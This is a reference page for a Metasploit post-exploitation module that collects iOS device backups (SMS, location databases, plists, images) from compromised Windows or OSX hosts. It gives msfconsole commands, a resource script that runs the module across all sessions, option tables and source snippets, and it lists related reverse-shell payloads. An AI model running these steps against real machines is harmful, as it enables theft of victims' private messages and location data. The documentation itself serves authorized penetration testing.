Windows Gather Apple iOS MobileSync Backup File Collection - Metasploit
This page contains detailed information about how to use the post/multi/gather/apple_ios_backup metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Gather Apple iOS MobileSync Backup File Collection
Module: post/multi/gather/apple_ios_backup
Source code: modules/post/multi/gather/apple_ios_backup.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): OSX, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will collect sensitive files from any on-disk iOS device backups
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/gather/apple_ios_backup
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/gather/apple_ios_backup
msf post(apple_ios_backup) > show options
... show and set options ...
msf post(apple_ios_backup) > set SESSION session-id
msf post(apple_ios_backup) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/gather/apple_ios_backup")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Go back to menu.
Msfconsole Usage
Here is how the multi/gather/apple_ios_backup post exploitation module looks in the msfconsole:
msf6 > use post/multi/gather/apple_ios_backup
msf6 post(multi/gather/apple_ios_backup) > show info
Name: Windows Gather Apple iOS MobileSync Backup File Collection
Module: post/multi/gather/apple_ios_backup
Platform: OSX, Windows
Arch:
Rank: Normal
Provided by:
hdm <[email protected]>
bannedit <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASES true no Collect all database files? (SMS, Location, etc)
EVERYTHING false no Collect all stored files? (SLOW)
IMAGES false no Collect all image files?
PLISTS true no Collect all preference list files?
SESSION yes The session to run this module on.
Description:
This module will collect sensitive files from any on-disk iOS device
backups
Module Options
This is a complete list of options available in the multi/gather/apple_ios_backup post exploitation module:
msf6 post(multi/gather/apple_ios_backup) > show options
Module options (post/multi/gather/apple_ios_backup):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASES true no Collect all database files? (SMS, Location, etc)
EVERYTHING false no Collect all stored files? (SLOW)
IMAGES false no Collect all image files?
PLISTS true no Collect all preference list files?
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the multi/gather/apple_ios_backup post exploitation module:
msf6 post(multi/gather/apple_ios_backup) > show advanced
Module advanced options (post/multi/gather/apple_ios_backup):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/gather/apple_ios_backup module can do:
msf6 post(multi/gather/apple_ios_backup) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/gather/apple_ios_backup post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/gather/apple_ios_backup) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Only meterpreter sessions are supported on windows hosts
- Unsupported platform <SESSION.PLATFORM>
- No users found with an iTunes backup directory
- Only checking <WHOAMI> account since we do not have SYSTEM...
- Manifest.mbdb not found in <PATH>...
- Manifest.mbdx not found in <PATH>...
- Failed to download <FNAME>: <E.CLASS> <E>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Only meterpreter sessions are supported on windows hosts
Here is a relevant code snippet related to the "Only meterpreter sessions are supported on windows hosts" error message:
52: @appdata = '\\Application Data'
53: @users = drive + '\\Documents and Settings'
54: end
55:
56: if session.type != "meterpreter"
57: print_error "Only meterpreter sessions are supported on windows hosts"
58: return
59: end
60: paths = enum_users_windows
61: else
62: print_error "Unsupported platform #{session.platform}"
Unsupported platform <SESSION.PLATFORM>
Here is a relevant code snippet related to the "Unsupported platform <SESSION.PLATFORM>" error message:
57: print_error "Only meterpreter sessions are supported on windows hosts"
58: return
59: end
60: paths = enum_users_windows
61: else
62: print_error "Unsupported platform #{session.platform}"
63: return
64: end
65:
66: if paths.empty?
67: print_status("No users found with an iTunes backup directory")
No users found with an iTunes backup directory
Here is a relevant code snippet related to the "No users found with an iTunes backup directory" error message:
62: print_error "Unsupported platform #{session.platform}"
63: return
64: end
65:
66: if paths.empty?
67: print_status("No users found with an iTunes backup directory")
68: return
69: end
70:
71: process_backups(paths)
72: end
Only checking <WHOAMI> account since we do not have SYSTEM...
Here is a relevant code snippet related to the "Only checking <WHOAMI> account since we do not have SYSTEM..." error message:
132: end
133: rescue ::Rex::Post::Meterpreter::RequestError
134: # Handle the case of the @users base directory is not accessible
135: end
136: else
137: print_status "Only checking #{whoami} account since we do not have SYSTEM..."
138: path = "#{@users}\\#{whoami}#{@appdata}\\Apple Computer\\MobileSync\\Backup"
139: dirs = check_for_backups_win(path)
140: dirs.each { |dir| paths << dir } if dirs
141: end
142: return paths
Manifest.mbdb not found in <PATH>...
Here is a relevant code snippet related to the "Manifest.mbdb not found in <PATH>..." error message:
170:
171: print_status("Reading Manifest.mbdb from #{path}...")
172: if session.type == "shell"
173: mbdb_data = session.shell_command("cat #{path}/Manifest.mbdb")
174: if mbdb_data =~ /No such file/i
175: print_status("Manifest.mbdb not found in #{path}...")
176: return
177: end
178: else
179: mfd = session.fs.file.new("#{path}\\Manifest.mbdb", "rb")
180: until mfd.eof?
Manifest.mbdx not found in <PATH>...
Here is a relevant code snippet related to the "Manifest.mbdx not found in <PATH>..." error message:
185:
186: print_status("Reading Manifest.mbdx from #{path}...")
187: if session.type == "shell"
188: mbdx_data = session.shell_command("cat #{path}/Manifest.mbdx")
189: if mbdx_data =~ /No such file/i
190: print_status("Manifest.mbdx not found in #{path}...")
191: return
192: end
193: else
194: mfd = session.fs.file.new("#{path}\\Manifest.mbdx", "rb")
195: until mfd.eof?
Failed to download <FNAME>: <E.CLASS> <E>
Here is a relevant code snippet related to the "Failed to download <FNAME>: <E.CLASS> <E>" error message:
232:
233: store_loot("ios.backup.data", ctype, session, fdata, rname, "iOS Backup: #{rname}")
234: rescue ::Interrupt
235: raise $!
236: rescue ::Exception => e
237: print_error("Failed to download #{fname}: #{e.class} #{e}")
238: end
239:
240: done[fname] = true
241: end
242: end
Go back to menu.
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2782 Merged Pull Request: Stop abusing expand path
- #2525 Merged Pull Request: Change module boilerplate
- #2417 Merged Pull Request: Prefer Ruby style for single word collections
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #958 Merged Pull Request: Msftidy 2
- #208 Merged Pull Request: Fixed gather/apple_ios_backup to work with OSX
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/dos/apple_ios/webkit_backdrop_filter_blur
- exploit/apple_ios/browser/safari_jit
- exploit/apple_ios/browser/safari_libtiff
- exploit/apple_ios/browser/webkit_createthis
- exploit/apple_ios/browser/webkit_trident
- exploit/apple_ios/email/mobilemail_libtiff
- exploit/apple_ios/ssh/cydia_default_ssh
- payload/apple_ios/aarch64/meterpreter_reverse_http
- payload/apple_ios/aarch64/meterpreter_reverse_https
- payload/apple_ios/aarch64/meterpreter_reverse_tcp
- payload/apple_ios/aarch64/shell_reverse_tcp
- payload/apple_ios/armle/meterpreter_reverse_http
- payload/apple_ios/armle/meterpreter_reverse_https
- payload/apple_ios/armle/meterpreter_reverse_tcp
- post/apple_ios/gather/ios_image_gather
- post/apple_ios/gather/ios_text_gather
- post/multi/gather/aws_ec2_instance_metadata
- post/multi/gather/aws_keys
- post/multi/gather/check_malware
- post/multi/gather/chrome_cookies
- post/multi/gather/dbvis_enum
- post/multi/gather/dns_bruteforce
- post/multi/gather/dns_reverse_lookup
- post/multi/gather/dns_srv_lookup
- post/multi/gather/docker_creds
- post/multi/gather/enum_hexchat
- post/multi/gather/enum_software_versions
- post/multi/gather/enum_vbox
- post/multi/gather/env
- post/multi/gather/fetchmailrc_creds
- post/multi/gather/filezilla_client_cred
- post/multi/gather/find_vmx
- post/multi/gather/firefox_creds
- post/multi/gather/gpg_creds
- post/multi/gather/grub_creds
- post/multi/gather/irssi_creds
- post/multi/gather/jboss_gather
- post/multi/gather/jenkins_gather
- post/multi/gather/lastpass_creds
- post/multi/gather/maven_creds
- post/multi/gather/multi_command
- post/multi/gather/netrc_creds
- post/multi/gather/pgpass_creds
- post/multi/gather/pidgin_cred
- post/multi/gather/ping_sweep
- post/multi/gather/remmina_creds
- post/multi/gather/resolve_hosts
- post/multi/gather/rsyncd_creds
- post/multi/gather/rubygems_api_key
- post/multi/gather/run_console_rc_file
- post/multi/gather/saltstack_salt
- post/multi/gather/skype_enum
- post/multi/gather/ssh_creds
- post/multi/gather/thunderbird_creds
- post/multi/gather/tomcat_gather
- post/multi/gather/ubiquiti_unifi_backup
- post/multi/gather/unix_cached_ad_hashes
- post/multi/gather/unix_kerberos_tickets
- post/multi/gather/wlan_geolocate
Authors
- hdm
- bannedit
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.